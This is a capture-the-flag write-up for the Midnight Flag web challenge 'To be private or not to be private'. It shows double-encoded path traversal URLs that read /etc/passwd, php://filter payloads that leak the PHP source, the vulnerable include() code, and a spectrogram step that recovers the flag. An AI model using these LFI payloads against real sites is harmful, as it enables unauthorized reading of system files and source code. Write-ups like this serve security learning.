CTF Midnight Flag : To be private or not to be private

The challenge statement gives us the following site: https://cloud.midnightflag.fr/index.php

By manipulating the URL, I quickly realize that a LFI vulnerability is exploitable.

So I start to inject a payload with double encoding in order to get the content of the file /etc/passwd:

https://cloud.midnightflag.fr/index.php?categorie=..%252f..%252f..%252fetc%252fpasswd

I have the content of the file in return but I don’t see any exploitable user or service:

private

So I decide to download the content of the index.php file with the PHP wrappers:

https://cloud.midnightflag.fr/index.php?categorie=php:%252F%252Ffilter%252Fconvert.base64-encode%252Fresource=index.php

With this request, I get the content of the index.php file in base64 directly on the web page.

After decoding, I see the following PHP code corresponding to the LFI filters applied (bypassing the function via double encoding):

    <?php
    function lfi_filter($value)
    {
        $omit_words = array('..', '../', '/');
        rsort($omit_words);
        $new_string = str_replace($omit_words, '', $value);
        return $new_string;
    }
    
    if (isset($_GET["category"])) {
      $categorie = lfi_filter($_GET["category"]);
      include urldecode($categorie);
    }else {
      include 'home.php';
    }
    ?>

From this moment, I look for a little moment before continuing the challenge because the recovered PHP code gives us no additional information.

Since fuzzing is not allowed on this challenge, it’s time for #guessing!

Looking at the title of the challenge and in adequacy with the structure of the site, after several attempts I try to join the page private.php via https://cloud.midnightflag.fr/index.php?categorie=private.php and I have a return!

So I get the source code of this page with the same payload as before:

https://cloud.midnightflag.fr/index.php?categorie=php:%252F%252Ffilter%252Fconvert.base64-encode%252Fresource=private.php

I get the following source code with an interesting ASCII comment:

<section>
      <td><img width="50%" class="center" src="categorie\Why-So-Sad-Funny-Clown-Face-Picture.jpg" alt="personal_attack.jpg"></td>
      <!--don't leak (\x70\x65\x72\x73\x6F\x6E\x61\x6C) -->
</section>

After conversion, I get the following value: personal

I suppose that the site has a personal category, so I go to the URL https://cloud.midnightflag.fr/index.php?categorie=personal.php which contains an audio recording in wav format.

After downloading the audio recording, I open it with the Audacity software in order to analyze the content.

The audio generated by the recording leads me to believe that an information is present in the spectrogram !

After inversion of the audio track and analysis of the spectrum, I recover the following information:

cloud2

Flag: MCTF{H1d3_Y0uR_S3cRe7s}